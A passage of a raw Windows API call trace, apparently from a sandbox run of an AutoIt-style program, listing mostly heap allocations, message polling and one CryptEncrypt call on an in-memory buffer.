Size=0x10) returned 0x2e51460 [0258.483] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0258.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0258.484] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0258.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0258.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0258.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0258.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0258.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0258.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0258.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0258.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0258.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0258.484] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0258.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0258.484] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0258.484] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0258.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0258.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b58 [0258.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0258.484] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0258.484] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0258.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0258.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0258.485] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0258.485] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0258.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d88 [0258.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0258.485] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0258.485] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0258.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0258.485] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0258.485] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0258.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0258.485] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0258.485] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0258.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0258.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0258.486] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.486] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0258.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0258.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0258.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0258.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e68 [0258.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0258.486] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0258.486] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0258.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0258.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0258.486] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0258.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0258.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0258.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0258.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0258.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e516b8 [0258.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e516b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0258.487] CryptEncrypt (in: hKey=0xa87350, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x3279, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x3280) returned 1 [0258.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0258.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0258.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0258.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0258.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0258.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0258.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0258.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0258.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0258.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0258.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0258.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0258.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0258.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0258.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0258.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0258.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0258.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0258.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0258.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0258.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0258.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0258.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0258.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0258.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0258.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0258.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0258.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0258.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0258.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0258.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0258.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0258.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0258.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0258.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0258.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0258.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0258.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0258.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0258.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0258.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0258.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0258.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0258.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0258.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0258.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0258.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0258.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0258.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0258.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0258.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0258.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0258.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0258.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0258.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0258.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0258.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0258.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0258.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0258.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0258.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0258.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0258.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0258.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0258.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0258.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0258.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0258.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0258.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0258.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0258.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0258.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0258.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0258.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0258.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0258.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0258.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0258.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0258.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0258.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0258.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0258.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0258.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0258.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0258.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0258.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0258.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0258.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0258.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0258.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0258.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0258.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0258.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0258.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0258.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0258.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0258.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0258.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0258.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0258.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0258.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978270 [0258.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0258.492] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0258.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0258.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0258.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0258.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0258.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0258.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0258.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0258.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0258.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0258.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0258.493] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0258.493] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0258.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0258.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0258.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0258.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0258.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0258.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0258.493] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0258.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0258.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0258.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0258.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0258.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0258.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0258.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0258.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0258.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0258.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0258.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0258.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0258.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0258.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0258.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0258.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0258.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0258.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0258.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0258.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0258.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0258.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0258.494] CharLowerBuffW (in: lpsz="byte[12928]", cchLength=0xb | out: lpsz="byte[12928]") returned 0xb [0258.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0258.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0258.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0258.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0258.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0258.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0258.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0258.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0258.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0258.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0258.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0258.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0258.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0258.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0258.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0258.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0258.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3280) returned 0x2f17298 [0258.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0258.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0258.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0258.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0258.495] HeapFree (in: 